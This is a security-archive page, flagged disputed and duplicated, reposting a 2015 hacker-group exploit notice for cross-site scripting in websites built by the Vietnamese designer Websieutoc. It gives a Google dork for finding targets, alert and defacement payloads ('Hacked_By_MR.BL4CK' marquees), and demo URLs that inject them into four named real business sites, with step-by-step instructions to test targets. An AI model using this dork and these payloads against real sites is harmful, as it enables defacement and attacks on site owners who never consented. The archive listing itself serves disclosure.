Disputed / BOGUS

Design by Websieutoc Cross Site Scripting Vulnerability

Published
Credit
Risk
2015.12.29
Gray Hat Group
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: intext:"Thiết kế web, Quảng cáo google bởi DMV"

DUPLICATED
https://cxsecurity.com/issue/WLB-2015120294

########################################################
# Exploit Title: Design by Websieutoc Cross Site Scripting Vulnerability
########################################################
# Google Dork: intext:"Thiết kế web, Quảng cáo google bởi DMV"
# Date: [28/12/2015]
# Exploit Author: Gray Hat Group=>MR.BL4CK
# Vendor Homepage: [http://websieutoc.vn/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target.
# Then test for this vulnerability You must Test scripts in After Id Number.
# for example These scripts:
# 1-[<script>alert('XSS')</script>
# 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>]
# 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>]
# Poc:
# http://thicongdien.com.vn/?madanhmucsanpham=2"><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>
# GooD LucK
########################################################
# Demo:
# http://thicongdien.com.vn/?madanhmucsanpham=2%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.diennongthontv.com/?madanhmucsanpham=19%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
# http://www.cophankythuatdongphuong.com/?madanhmucsanpham=2%3Ch1%3ETest%3C/h1%3E
# http://nhuavosong.com/?madanhmucsanpham=11%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E
########################################################
# Thanks to : Bl4ck W4rning | Dalghak | MR.BL4CK | WHITE | H!dden V!rus | Shayan 72 | Keian | Ahriman | MR.ROBOT
# We Are Gray Hat Hackers
# Discovered By:MR.BL4CK
########################################################


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com